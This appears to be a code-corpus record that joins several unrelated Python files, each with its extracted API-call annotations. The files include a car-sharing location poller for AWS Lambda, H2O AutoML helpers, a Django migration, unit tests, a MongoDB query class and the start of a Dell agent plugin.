"hummingbird.graphics.state_plot.StatePlot",
"pyqtgraph.intColor",
"pyqtgraph.mkPen"
] | [((2115, 2149), 'pyqtgraph.mkPen', 'pg.mkPen', ([], {'color': 'color', 'width': 'width'}), '(color=color, width=width)\n', (2123, 2149), True, 'import pyqtgraph as pg\n'), ((2531, 2565), 'hummingbird.graphics.state_plot.StatePlot', 'StatePlot', (['self.plotbox', 'plot_args'], {}), '(self.plotbox, plot_args)\n', (2540, 2565), False, 'from hummingbird.graphics.state_plot import StatePlot\n'), ((3605, 3774), 'pyqtgraph.intColor', 'pg.intColor', (['index'], {'minValue': 'self.plot_min_value', 'maxValue': 'self.plot_max_value', 'hues': 'self.distinct_plot_hues', 'minHue': 'self.plot_min_hue', 'maxHue': 'self.plot_max_hue'}), '(index, minValue=self.plot_min_value, maxValue=self.\n plot_max_value, hues=self.distinct_plot_hues, minHue=self.plot_min_hue,\n maxHue=self.plot_max_hue)\n', (3616, 3774), True, 'import pyqtgraph as pg\n')] |
import json
#start
print('start')
with open('quizoutput.txt') as f:
lines = f.readlines()
print('loaded quiz data')
print('changing to json')
json_output = json.loads(lines[0])
print(json_output)
with open('quizoutput.txt', 'w') as f:
f.write(json_output)
# for item in json_output:
# print(item['question'])
# print('done')
| [
"json.loads"
] | [((166, 186), 'json.loads', 'json.loads', (['lines[0]'], {}), '(lines[0])\n', (176, 186), False, 'import json\n')] |
#!/usr/bin/python
import requests
import boto3
import time
import geopy.distance
import xml.etree.ElementTree as ET
import itertools
import sys
import pickle
S3_BUCKET = "panku-gdzie-jestes-latest-storage"
class LatestPositionStorage(object):
def __init__(self, service):
self.objectName = "%s.latest" % service
def getLatestPositionsForService(self):
s3 = boto3.resource('s3')
try:
obj = s3.Object(S3_BUCKET, self.objectName)
ret = pickle.loads(obj.get()['Body'].read())
print("Read %d positions from S3" % len(ret))
return ret
except:
print("Unexpected error:", sys.exc_info())
return {}
def saveLatestPositionsForService(self, positions):
s3 = boto3.resource('s3')
print("Saving %d positions to S3" % (len(positions)))
pickle_byte_obj = pickle.dumps(positions)
s3.Object(S3_BUCKET, self.objectName).put(Body=pickle_byte_obj)
class Service(object):
def getSecretName(self):
pass
def getCredentials(self):
secret_name = self.getSecretName()
region_name = "eu-west-1"
session = boto3.session.Session()
client = session.client(service_name='secretsmanager', region_name=region_name)
get_secret_value_response = client.get_secret_value(SecretId=secret_name)
return get_secret_value_response["SecretString"].replace('"', '').replace("{","").replace("}", "").split(":")
def identifierPerRegistration(self, registration):
pass
def serviceId(self):
# TODO: reverse it, let subclasses override this, and implement `identifierPerRegistration` here in the superclass
return self.identifierPerRegistration("").strip()
def getLatestPositions(self):
return LatestPositionStorage(self.serviceId()).getLatestPositionsForService()
def saveLatestPositions(self, positions):
return LatestPositionStorage(self.serviceId()).saveLatestPositionsForService(positions)
def saveLocations(self, cars):
now = int(time.time())
latestPositions = self.getLatestPositions()
newPositions = latestPositions.copy()
table = boto3.resource('dynamodb', region_name='eu-west-1').Table('cars')
dynamodb = boto3.client('dynamodb', region_name='eu-west-1')
for (registration, position) in cars:
key = self.identifierPerRegistration(registration)
latestPosition = latestPositions.get(key)
shouldAdd = True
existedBefore = latestPosition is not None
if existedBefore:
prevPosition = (latestPosition['long'], latestPosition['lat'])
currentPosition = (position['lng'], position['lat'])
distance = geopy.distance.vincenty(prevPosition, currentPosition).km
if distance < 0.1:
shouldAdd = False
if shouldAdd:
print("%s moved" % key)
if existedBefore:
r = table.put_item(Item = {'carId' : key, 'date' : now-1,'long': prevPosition[0], 'lat': prevPosition[1]})
r = table.put_item(Item = {'carId' : key, 'date' : now, 'long': "%8.6f" % position['lng'], 'lat': "%8.6f" % position['lat']})
newPositions[key] = {'long': "%8.6f" % position['lng'], 'lat': "%8.6f" % position['lat']}
self.saveLatestPositions(newPositions)
def getAndSaveLocations(self):
self.saveLocations(self.getLocations())
class Panek(Service):
def getSecretName(self):
return "panek/login"
def identifierPerRegistration(self, registration):
return "PANEK " + registration
def getLocations(self):
s = requests.Session()
s.headers.update({"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:64.0) Gecko/20100101 Firefox/64.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-GB,en;q=0.7,en-US;q=0.3",
"Upgrade-Insecure-Requests": "1",
"DNT": "1",
})
s.get("https://panel.panekcs.pl/security/login")
username, password = self.getCredentials()
r = s.post(url = "https://panel.panekcs.pl/security/login", data={"UserName": username, "Password": password})
assert r.status_code == 200
r = s.post(url = "https://panel.panekcs.pl/Home/GetLocations", data = {})
assert r.status_code == 200
locations = r.json()
# Under Vehicles: [u'Category', u'FuelRange', u'Ids', u'Coordinates', u'RegistrationNumber', u'Fuel']
count = len(locations['Vehicles']['Ids'])
coordinates = locations['Vehicles']['Coordinates']
registrations = locations['Vehicles']['RegistrationNumber']
return zip(registrations, coordinates)
class Veturilo(Service):
def identifierPerRegistration(self, registration):
return "VETURILO " + registration
def getLocations(self):
s = requests.Session()
s.headers.update({"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:64.0) Gecko/20100101 Firefox/64.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-GB,en;q=0.7,en-US;q=0.3",
"Upgrade-Insecure-Requests": "1",
"DNT": "1",
})
r = s.get("https://nextbike.net/maps/nextbike-official.xml?city=372,210,475")
assert r.status_code == 200
root = ET.fromstring(r.content)
ret = []
for place in root.findall(".//place"):
for bike in place:
ret.append((bike.get("number"), {"lng" : float(place.get("lng")), "lat": float(place.get("lat"))}))
return ret
class Traficar(Service):
def identifierPerRegistration(self, registration):
return "TRAFICAR " + registration
def getLocations(self):
s = requests.Session()
s.headers.update({"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:64.0) Gecko/20100101 Firefox/64.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-GB,en;q=0.7,en-US;q=0.3",
"Upgrade-Insecure-Requests": "1",
"DNT": "1",
})
r = s.get("https://api.traficar.pl/eaw-rest-api/car?shapeId=2")
data = r.json()
return [(car['regNumber'], {"lng": car['longitude'], "lat":car['latitude']}) for car in data['cars']]
def lambda_handler(event, context):
services = [Traficar, Veturilo, Panek]
for service in services:
print("==== Service %s" % service)
service().getAndSaveLocations()
return "OK"
| [
"boto3.client",
"boto3.session.Session",
"requests.Session",
"pickle.dumps",
"sys.exc_info",
"boto3.resource",
"xml.etree.ElementTree.fromstring",
"time.time"
] | [((373, 393), 'boto3.resource', 'boto3.resource', (['"""s3"""'], {}), "('s3')\n", (387, 393), False, 'import boto3\n'), ((716, 736), 'boto3.resource', 'boto3.resource', (['"""s3"""'], {}), "('s3')\n", (730, 736), False, 'import boto3\n'), ((817, 840), 'pickle.dumps', 'pickle.dumps', (['positions'], {}), '(positions)\n', (829, 840), False, 'import pickle\n'), ((1082, 1105), 'boto3.session.Session', 'boto3.session.Session', ([], {}), '()\n', (1103, 1105), False, 'import boto3\n'), ((2158, 2207), 'boto3.client', 'boto3.client', (['"""dynamodb"""'], {'region_name': '"""eu-west-1"""'}), "('dynamodb', region_name='eu-west-1')\n", (2170, 2207), False, 'import boto3\n'), ((3506, 3524), 'requests.Session', 'requests.Session', ([], {}), '()\n', (3522, 3524), False, 'import requests\n'), ((4783, 4801), 'requests.Session', 'requests.Session', ([], {}), '()\n', (4799, 4801), False, 'import requests\n'), ((5338, 5362), 'xml.etree.ElementTree.fromstring', 'ET.fromstring', (['r.content'], {}), '(r.content)\n', (5351, 5362), True, 'import xml.etree.ElementTree as ET\n'), ((5733, 5751), 'requests.Session', 'requests.Session', ([], {}), '()\n', (5749, 5751), False, 'import requests\n'), ((1952, 1963), 'time.time', 'time.time', ([], {}), '()\n', (1961, 1963), False, 'import time\n'), ((2077, 2128), 'boto3.resource', 'boto3.resource', (['"""dynamodb"""'], {'region_name': '"""eu-west-1"""'}), "('dynamodb', region_name='eu-west-1')\n", (2091, 2128), False, 'import boto3\n'), ((619, 633), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (631, 633), False, 'import sys\n')] |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2017-12-08 18:42
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
def update_questionnaires(apps, schema_editor):
"""
Forward migration function to normalize settings into VMSettings and CloudSettings models
:param apps: Django apps
:param schema_editor: unused
:return: None
"""
VMSettings = apps.get_model("data", "VMSettings")
CloudSettings = apps.get_model("data", "CloudSettings")
JobQuestionnaire = apps.get_model("data", "JobQuestionnaire")
Job = apps.get_model("data", "Job")
for q in JobQuestionnaire.objects.all():
# Create a cloud settings object with the VM project from the questionnaire.
# Object initially just has the project name as its name
cloud_settings, _ = CloudSettings.objects.get_or_create(name=q.vm_project.name, vm_project=q.vm_project)
vm_settings, _ = VMSettings.objects.get_or_create(name=q.vm_project.name, cloud_settings=cloud_settings)
q.vm_settings = vm_settings
q.save()
class Migration(migrations.Migration):
dependencies = [
('data', '0039_1_schema_add_questionnare_vmsettings'),
]
operations = [
# Populate VMSettings and CloudSettings objects from JobQuesetionnaire
migrations.RunPython(update_questionnaires),
]
| [
"django.db.migrations.RunPython"
] | [((1361, 1404), 'django.db.migrations.RunPython', 'migrations.RunPython', (['update_questionnaires'], {}), '(update_questionnaires)\n', (1381, 1404), False, 'from django.db import migrations, models\n')] |
import os
import unittest
import json
import filecmp
from genofunk.sequence_utils import *
this_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
class TestSequenceUtils(unittest.TestCase):
def test_get_coordinates_from_json_simple_pairs(self):
json_value = {
"start": 30,
"end": 40,
"strand": 1
}
coordinates = get_coordinates_from_json(json_value, pairs=True)
expected = [[30, 40]]
self.assertEqual(expected, coordinates)
def test_get_coordinates_from_json_simple_no_pairs(self):
json_value = {
"start": 30,
"end": 40,
"strand": 1
}
coordinates = get_coordinates_from_json(json_value, pairs=False)
expected = [30, 40]
self.assertEqual(expected, coordinates)
def test_get_coordinates_from_json_join_pairs(self):
json_value = {
"join": [
{ "start": 0, "end": 11, "strand": 1 },
{ "start": 10, "end": 20, "strand": 1 }
]
}
coordinates = get_coordinates_from_json(json_value, pairs=True)
expected = [[0,11],[10,20]]
self.assertEqual(expected, coordinates)
def test_get_coordinates_from_json_join_no_pairs(self):
json_value = {
"join": [
{ "start": 0, "end": 11, "strand": 1 },
{ "start": 10, "end": 20, "strand": 1 }
]
}
coordinates = get_coordinates_from_json(json_value, pairs=False)
expected = [0,11,10,20]
self.assertEqual(expected, coordinates)
def test_is_open_reading_frame_wrong_start(self):
amino_acid_sequence = "NATIL*"
result = is_open_reading_frame(amino_acid_sequence)
self.assertFalse(result)
def test_is_open_reading_frame_wrong_end(self):
amino_acid_sequence = "MNATIL*S"
result = is_open_reading_frame(amino_acid_sequence)
self.assertFalse(result)
def test_is_open_reading_frame_stop_in_middle(self):
amino_acid_sequence = "MNATIL*S*"
result = is_open_reading_frame(amino_acid_sequence, allow_stop_codons_in_middle=False)
self.assertFalse(result)
def test_is_open_reading_frame_stop_in_middle_allowed(self):
amino_acid_sequence = "MNATIL*S*"
result = is_open_reading_frame(amino_acid_sequence, allow_stop_codons_in_middle=True)
self.assertTrue(result) | [
"os.path.abspath"
] | [((136, 161), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (151, 161), False, 'import os\n')] |
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 13 09:52:47 2015
@author: wirkert
"""
import unittest
import os
import numpy as np
import msi.msimanipulations as msimani
from msi.io.nrrdreader import NrrdReader
from msi.io.nrrdwriter import NrrdWriter
from msi.test import helpers
class TestNrrdWriter(unittest.TestCase):
def setUp(self):
# setup file and the path where it shall be written to
self.msi = helpers.getFakeMsi()
self.fileUriToWrite = "testfile.nrrd"
def tearDown(self):
# remove the hopefully written file
os.remove(self.fileUriToWrite)
def test_imageWriterCreatesFile(self):
writer = NrrdWriter(self.msi)
writer.write(self.fileUriToWrite)
self.assertTrue(os.path.isfile(self.fileUriToWrite),
"file was written to disk")
def test_imageWriterCreatesCorrectFile(self):
writer = NrrdWriter(self.msi)
writer.write(self.fileUriToWrite)
reader = NrrdReader()
msi = reader.read(self.fileUriToWrite)
self.assertTrue(msi == helpers.getFakeMsi(),
"image correctly written and read")
def test_write_one_d_image_works(self):
writer = NrrdWriter(self.msi)
msimani.calculate_mean_spectrum(self.msi)
writer.write(self.fileUriToWrite)
reader = NrrdReader()
msi = reader.read(self.fileUriToWrite)
np.testing.assert_array_equal(msi.get_image(),
np.array([1, 2, 3, 4, 5]),
"1d image correctly written and read")
| [
"msi.io.nrrdreader.NrrdReader",
"os.remove",
"os.path.isfile",
"numpy.array",
"msi.msimanipulations.calculate_mean_spectrum",
"msi.test.helpers.getFakeMsi",
"msi.io.nrrdwriter.NrrdWriter"
] | [((430, 450), 'msi.test.helpers.getFakeMsi', 'helpers.getFakeMsi', ([], {}), '()\n', (448, 450), False, 'from msi.test import helpers\n'), ((574, 604), 'os.remove', 'os.remove', (['self.fileUriToWrite'], {}), '(self.fileUriToWrite)\n', (583, 604), False, 'import os\n'), ((666, 686), 'msi.io.nrrdwriter.NrrdWriter', 'NrrdWriter', (['self.msi'], {}), '(self.msi)\n', (676, 686), False, 'from msi.io.nrrdwriter import NrrdWriter\n'), ((911, 931), 'msi.io.nrrdwriter.NrrdWriter', 'NrrdWriter', (['self.msi'], {}), '(self.msi)\n', (921, 931), False, 'from msi.io.nrrdwriter import NrrdWriter\n'), ((992, 1004), 'msi.io.nrrdreader.NrrdReader', 'NrrdReader', ([], {}), '()\n', (1002, 1004), False, 'from msi.io.nrrdreader import NrrdReader\n'), ((1242, 1262), 'msi.io.nrrdwriter.NrrdWriter', 'NrrdWriter', (['self.msi'], {}), '(self.msi)\n', (1252, 1262), False, 'from msi.io.nrrdwriter import NrrdWriter\n'), ((1271, 1312), 'msi.msimanipulations.calculate_mean_spectrum', 'msimani.calculate_mean_spectrum', (['self.msi'], {}), '(self.msi)\n', (1302, 1312), True, 'import msi.msimanipulations as msimani\n'), ((1373, 1385), 'msi.io.nrrdreader.NrrdReader', 'NrrdReader', ([], {}), '()\n', (1383, 1385), False, 'from msi.io.nrrdreader import NrrdReader\n'), ((753, 788), 'os.path.isfile', 'os.path.isfile', (['self.fileUriToWrite'], {}), '(self.fileUriToWrite)\n', (767, 788), False, 'import os\n'), ((1526, 1551), 'numpy.array', 'np.array', (['[1, 2, 3, 4, 5]'], {}), '([1, 2, 3, 4, 5])\n', (1534, 1551), True, 'import numpy as np\n'), ((1083, 1103), 'msi.test.helpers.getFakeMsi', 'helpers.getFakeMsi', ([], {}), '()\n', (1101, 1103), False, 'from msi.test import helpers\n')] |
import h2o
from h2o.base import Keyed
from h2o.exceptions import H2OValueError
from h2o.job import H2OJob
from h2o.model import ModelBase
from h2o.utils.typechecks import assert_is_type, is_type
class H2OAutoMLBaseMixin:
def predict(self, test_data):
"""
Predict on a dataset.
:param H2OFrame test_data: Data on which to make predictions.
:returns: A new H2OFrame of predictions.
:examples:
>>> # Set up an H2OAutoML object
>>> aml = H2OAutoML(max_runtime_secs=30)
>>> # Launch an H2OAutoML run
>>> aml.train(y=y, training_frame=train)
>>> # Predict with top model from AutoML Leaderboard on a H2OFrame called 'test'
>>> aml.predict(test)
>>>
>>> # Get AutoML object by `project_name`
>>> get_aml = h2o.automl.get_automl(aml.project_name)
>>> # Predict with top model from AutoML Leaderboard on a H2OFrame called 'test'
>>> get_aml.predict(test)
"""
return self.leader.predict(test_data)
# ---------------------------------------------------------------------------
# Download POJO/MOJO with AutoML
# ---------------------------------------------------------------------------
def download_pojo(self, path="", get_genmodel_jar=False, genmodel_name=""):
"""
Download the POJO for the leader model in AutoML to the directory specified by path.
If path is an empty string, then dump the output to screen.
:param path: An absolute path to the directory where POJO should be saved.
:param get_genmodel_jar: if True, then also download h2o-genmodel.jar and store it in folder ``path``.
:param genmodel_name: Custom name of genmodel jar
:returns: name of the POJO file written.
"""
return h2o.download_pojo(self.leader, path, get_jar=get_genmodel_jar, jar_name=genmodel_name)
def download_mojo(self, path=".", get_genmodel_jar=False, genmodel_name=""):
"""
Download the leader model in AutoML in MOJO format.
:param path: the path where MOJO file should be saved.
:param get_genmodel_jar: if True, then also download h2o-genmodel.jar and store it in folder ``path``.
:param genmodel_name: Custom name of genmodel jar
:returns: name of the MOJO file written.
"""
return ModelBase.download_mojo(self.leader, path, get_genmodel_jar, genmodel_name)
@property
def project_name(self):
"""
Retrieve a string indicating the project_name of the automl instance to retrieve.
:return: a string containing the project_name
"""
pass
@property
def leader(self):
"""
Retrieve the top model from an H2OAutoML object
:return: an H2O model
:examples:
>>> # Set up an H2OAutoML object
>>> aml = H2OAutoML(max_runtime_secs=30)
>>> # Launch an AutoML run
>>> aml.train(y=y, training_frame=train)
>>> # Get the best model in the AutoML Leaderboard
>>> aml.leader
>>>
>>> # Get AutoML object by `project_name`
>>> get_aml = h2o.automl.get_automl(aml.project_name)
>>> # Get the best model in the AutoML Leaderboard
>>> get_aml.leader
"""
pass
@property
def leaderboard(self):
"""
Retrieve the leaderboard from an H2OAutoML object
:return: an H2OFrame with model ids in the first column and evaluation metric in the second column sorted
by the evaluation metric
:examples:
>>> # Set up an H2OAutoML object
>>> aml = H2OAutoML(max_runtime_secs=30)
>>> # Launch an AutoML run
>>> aml.train(y=y, training_frame=train)
>>> # Get the AutoML Leaderboard
>>> aml.leaderboard
>>>
>>> # Get AutoML object by `project_name`
>>> get_aml = h2o.automl.get_automl(aml.project_name)
>>> # Get the AutoML Leaderboard
>>> get_aml.leaderboard
"""
pass
@property
def training_info(self):
"""
Expose the name/value columns of `event_log` as a simple dictionary, for example `start_epoch`, `stop_epoch`, ...
See :func:`event_log` to obtain a description of those key/value pairs.
:return: a dictionary with event_log['name'] column as keys and event_log['value'] column as values.
"""
pass
@property
def event_log(self):
"""
Retrieve the backend event log from an H2OAutoML object
:return: an H2OFrame with detailed events occurred during the AutoML training.
"""
pass
def get_leaderboard(self, extra_columns=None):
"""
Retrieve the leaderboard.
Contrary to the default leaderboard attached to the instance, this one can return columns other than the metrics.
:param extra_columns: a string or a list of string specifying which optional columns should be added to the leaderboard. Defaults to None.
Currently supported extensions are:
- 'ALL': adds all columns below.
- 'training_time_ms': column providing the training time of each model in milliseconds (doesn't include the training of cross validation models).
- 'predict_time_per_row_ms`: column providing the average prediction time by the model for a single row.
- 'algo': column providing the algorithm name for each model.
:return: An H2OFrame representing the leaderboard.
:examples:
>>> aml = H2OAutoML(max_runtime_secs=30)
>>> aml.train(y=y, training_frame=train)
>>> lb_all = aml.get_leaderboard('ALL')
>>> lb_custom = aml.get_leaderboard(['predict_time_per_row_ms', 'training_time_ms'])
>>> lb_custom_sorted = lb_custom.sort(by='predict_time_per_row_ms')
"""
assert isinstance(self, Keyed)
return _fetch_leaderboard(self.key, extra_columns)
def get_best_model(self, algorithm=None, criterion=None):
"""
Get best model of a given family/algorithm for a given criterion from an AutoML object.
:param algorithm: One of "basemodel", "deeplearning", "drf", "gbm", "glm", "stackedensemble", "xgboost".
If None, pick the best model regardless of the algorithm.
:param criterion: Criterion can be one of the metrics reported in leaderboard. If set to None, the same ordering
as in the leaderboard will be used.
Avaliable criteria:
- Regression metrics: deviance, rmse, mse, mae, rmsle
- Binomial metrics: auc, logloss, aucpr, mean_per_class_error, rmse, mse
- Multinomial metrics: mean_per_class_error, logloss, rmse, mse
The following additional leaderboard information can be also used as a criterion:
- 'training_time_ms': column providing the training time of each model in milliseconds (doesn't include the training of cross validation models).
- 'predict_time_per_row_ms`: column providing the average prediction time by the model for a single row.
:return: An H2OModel or None if no model of a given family is present
:examples:
>>> # Set up an H2OAutoML object
>>> aml = H2OAutoML(max_runtime_secs=30)
>>> # Launch an AutoML run
>>> aml.train(y=y, training_frame=train)
>>> gbm = aml.get_best_model("gbm")
"""
from h2o.exceptions import H2OValueError
def _get_models(leaderboard):
return [m[0] for m in
leaderboard["model_id"].as_data_frame(use_pandas=False, header=False)]
higher_is_better = ["auc", "aucpr"]
assert_is_type(algorithm, None, str)
assert_is_type(criterion, None, str)
if criterion is not None:
criterion = criterion.lower()
if "deviance" == criterion:
criterion = "mean_residual_deviance"
if algorithm is not None:
if algorithm.lower() not in ("basemodel", "deeplearning", "drf", "gbm",
"glm", "stackedensemble", "xgboost"):
raise H2OValueError("Algorithm \"{}\" is not supported!".format(algorithm))
algorithm = algorithm.lower()
extra_cols = ["algo"]
if criterion in ("training_time_ms", "predict_time_per_row_ms"):
extra_cols.append(criterion)
leaderboard = h2o.automl.get_leaderboard(self, extra_columns=extra_cols)
leaderboard = leaderboard if algorithm is None else (
leaderboard[leaderboard["algo"].tolower() == algorithm, :] if algorithm != "basemodel"
else leaderboard[leaderboard["algo"].tolower() != "stackedensemble", :])
if leaderboard.nrow == 0:
return None
if criterion is None:
return h2o.get_model(leaderboard[0, "model_id"])
if criterion not in leaderboard.columns:
raise H2OValueError("Criterion \"{}\" is not present in the leaderboard!".format(criterion))
models_in_default_order = _get_models(leaderboard)
sorted_lb = leaderboard.sort(by=criterion, ascending=criterion not in higher_is_better)
selected_models = _get_models(sorted_lb[sorted_lb[criterion] == sorted_lb[0, criterion]])
picked_model = [model for model in models_in_default_order if model in selected_models][0]
return h2o.get_model(picked_model)
def _fetch_leaderboard(aml_id, extensions=None):
assert_is_type(extensions, None, str, [str])
extensions = ([] if extensions is None
else [extensions] if is_type(extensions, str)
else extensions)
resp = h2o.api("GET /99/Leaderboards/%s" % aml_id, data=dict(extensions=extensions))
dest_key = resp['project_name'].split('@', 1)[0]+"_custom_leaderboard"
return _fetch_table(resp['table'], key=dest_key, progress_bar=False)
def _fetch_table(table, key=None, progress_bar=True):
try:
# Intentionally mask the progress bar here since showing multiple progress bars is confusing to users.
# If any failure happens, revert back to user's original setting for progress and display the error message.
ori_progress_state = H2OJob.__PROGRESS_BAR__
H2OJob.__PROGRESS_BAR__ = progress_bar
# Parse leaderboard H2OTwoDimTable & return as an H2OFrame
fr = h2o.H2OFrame(table.cell_values, destination_frame=key, column_names=table.col_header, column_types=table.col_types)
return h2o.assign(fr[1:], key) # removing index and reassign id to ensure persistence on backend
finally:
H2OJob.__PROGRESS_BAR__ = ori_progress_state
def _fetch_state(aml_id, properties=None, verbosity=None):
state_json = h2o.api("GET /99/AutoML/%s" % aml_id, data=dict(verbosity=verbosity))
project_name = state_json["project_name"]
if project_name is None:
raise H2OValueError("No AutoML instance with id {}.".format(aml_id))
leaderboard_list = [key["name"] for key in state_json['leaderboard']['models']]
leader_id = leaderboard_list[0] if (leaderboard_list is not None and len(leaderboard_list) > 0) else None
should_fetch = lambda prop: properties is None or prop in properties
leader = None
if should_fetch('leader'):
leader = h2o.get_model(leader_id) if leader_id is not None else None
leaderboard = None
if should_fetch('leaderboard'):
leaderboard = _fetch_table(state_json['leaderboard_table'], key=project_name+"_leaderboard", progress_bar=False)
event_log = None
if should_fetch('event_log'):
event_log = _fetch_table(state_json['event_log_table'], key=project_name+"_eventlog", progress_bar=False)
return dict(
project_name=project_name,
json=state_json,
leader_id=leader_id,
leader=leader,
leaderboard=leaderboard,
event_log=event_log,
)
| [
"h2o.get_model",
"h2o.model.ModelBase.download_mojo",
"h2o.utils.typechecks.is_type",
"h2o.download_pojo",
"h2o.utils.typechecks.assert_is_type",
"h2o.H2OFrame",
"h2o.assign",
"h2o.automl.get_leaderboard"
] | [((9792, 9836), 'h2o.utils.typechecks.assert_is_type', 'assert_is_type', (['extensions', 'None', 'str', '[str]'], {}), '(extensions, None, str, [str])\n', (9806, 9836), False, 'from h2o.utils.typechecks import assert_is_type, is_type\n'), ((1841, 1932), 'h2o.download_pojo', 'h2o.download_pojo', (['self.leader', 'path'], {'get_jar': 'get_genmodel_jar', 'jar_name': 'genmodel_name'}), '(self.leader, path, get_jar=get_genmodel_jar, jar_name=\n genmodel_name)\n', (1858, 1932), False, 'import h2o\n'), ((2391, 2466), 'h2o.model.ModelBase.download_mojo', 'ModelBase.download_mojo', (['self.leader', 'path', 'get_genmodel_jar', 'genmodel_name'], {}), '(self.leader, path, get_genmodel_jar, genmodel_name)\n', (2414, 2466), False, 'from h2o.model import ModelBase\n'), ((7976, 8012), 'h2o.utils.typechecks.assert_is_type', 'assert_is_type', (['algorithm', 'None', 'str'], {}), '(algorithm, None, str)\n', (7990, 8012), False, 'from h2o.utils.typechecks import assert_is_type, is_type\n'), ((8021, 8057), 'h2o.utils.typechecks.assert_is_type', 'assert_is_type', (['criterion', 'None', 'str'], {}), '(criterion, None, str)\n', (8035, 8057), False, 'from h2o.utils.typechecks import assert_is_type, is_type\n'), ((8721, 8779), 'h2o.automl.get_leaderboard', 'h2o.automl.get_leaderboard', (['self'], {'extra_columns': 'extra_cols'}), '(self, extra_columns=extra_cols)\n', (8747, 8779), False, 'import h2o\n'), ((9701, 9728), 'h2o.get_model', 'h2o.get_model', (['picked_model'], {}), '(picked_model)\n', (9714, 9728), False, 'import h2o\n'), ((10675, 10795), 'h2o.H2OFrame', 'h2o.H2OFrame', (['table.cell_values'], {'destination_frame': 'key', 'column_names': 'table.col_header', 'column_types': 'table.col_types'}), '(table.cell_values, destination_frame=key, column_names=table.\n col_header, column_types=table.col_types)\n', (10687, 10795), False, 'import h2o\n'), ((10806, 10829), 'h2o.assign', 'h2o.assign', (['fr[1:]', 'key'], {}), '(fr[1:], key)\n', (10816, 10829), False, 'import h2o\n'), ((9135, 9176), 'h2o.get_model', 'h2o.get_model', (["leaderboard[0, 'model_id']"], {}), "(leaderboard[0, 'model_id'])\n", (9148, 9176), False, 'import h2o\n'), ((9919, 9943), 'h2o.utils.typechecks.is_type', 'is_type', (['extensions', 'str'], {}), '(extensions, str)\n', (9926, 9943), False, 'from h2o.utils.typechecks import assert_is_type, is_type\n'), ((11598, 11622), 'h2o.get_model', 'h2o.get_model', (['leader_id'], {}), '(leader_id)\n', (11611, 11622), False, 'import h2o\n')] |
# coding: utf-8
from pymongo import MongoClient
import conf
class MongoQuery(object):
def __init__(self):
self._conn = MongoClient(conf.mongodb_conn_str)
self._db = self._conn.geokb
def query(self, grounded, limit=15, sort_keys=None):
col = self._db[grounded['from']]
docs = col.find(grounded['where'],
limit=limit,
sort=([('popularity', -1)]
+ ['_sys_ranks.%s' % x[0] for x in sort_keys if x is not None])
)
if '*' in grounded['select']:
res = [dict((k, v) for k, v in doc.iteritems() if k != '_id') for doc in docs]
else:
res = []
for doc in docs:
selected = {}
for k in grounded['select']:
if k in doc:
selected[k] = doc[k]
res.append(selected)
return res
def coarse_query(self, grounded, limit=2000, sort_keys=None):
col = self._db[grounded['from']]
# docs = col.find(grounded['where'], limit=limit, sort=[('popularity', -1), ('_id', 1)])
docs = col.find(grounded['where'],
limit=limit,
sort=([('popularity', -1)]
+ [('_sys_ranks.%s' % x[0], -1) for x in sort_keys if x is not None])
)
return [dict((k, v) for k, v in doc.iteritems() if k != '_id') for doc in docs]
def project(self, docs, grounded, limit=15):
res = []
for doc in docs:
if len(res) >= 15:
break
try:
score = doc['_rerank']['TimeRanker']
if score < 1:
continue
except KeyError:
pass
if '*' in grounded['select']:
doc = dict((k, v) if type(v) != type([]) else (k, self._merge_obj_array(v))
for k, v in doc.iteritems() if k != '_id')
doc['src'] = 'geokb'
doc['score'] = 2.0 # fixed high score for nginx blender, in another module
res.append(doc)
else:
selected = {}
for k in grounded['select']:
if type(doc[k]) == type([]):
selected[k] = self._merge_obj_array(doc[k])
else:
selected[k] = doc[k]
selected['_sys_ranks'] = doc['_sys_ranks']
selected['src'] = 'geokb'
selected['score'] = 2.0 # fixed high score for nginx blender, in another module
res.append(selected)
return res
@staticmethod
def _merge_obj_array(arr):
if len(arr) == 0 or type(arr) != type([]):
return arr
if type(arr[0]) != type(dict()):
return arr
# [{u'推荐菜': u'AA"}, {u'推荐菜': u'BB'}, ...]
get_val_lst = lambda o: [v for _, v in o.iteritems()]
lst = []
for obj in arr:
lst += get_val_lst(obj)
return lst
| [
"pymongo.MongoClient"
] | [((133, 167), 'pymongo.MongoClient', 'MongoClient', (['conf.mongodb_conn_str'], {}), '(conf.mongodb_conn_str)\n', (144, 167), False, 'from pymongo import MongoClient\n')] |
#
# Copyright (C) 2014 Dell, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import configparser
import json
import logging
import os
import urllib.parse
import dcm.agent.exceptions as exceptions
import dcm.agent.logger as dcm_logger
import dcm.agent.plugins.api.base as plugin_base
import dcm.agent.plugins.api.exceptions as plugin_exceptions
import dcm.agent.plugins.api.utils as plugin_utils
import dcm.agent.utils as utils
_g_logger = logging.getLogger(__name__)
class ConfigureServer(plugin_base.Plugin):
protocol_arguments = {
"configType":
("Which configuration management software to use (chef or puppet)",
True, str, None),
"authId":
("", False, str, None),
"configurationData":
("", False, plugin_utils.base64type_convertor, None),
"encryptedConfigToken":
("", False, plugin_utils.base64type_convertor, None),
"encryptedAuthSecret":
("", False, plugin_utils.base64type_convertor, None),
"endpoint":
("", False, str, None),
"providerRegionId":
("", False, str, None),
"runAsUser":
("", False, str, None),
"storageDelegate":
("", False, str, None),
"storageEndpoint":
("", False, str, None),
"storageAccount":
("", False, str, None),
"scriptFiles":
("", False, list, None),
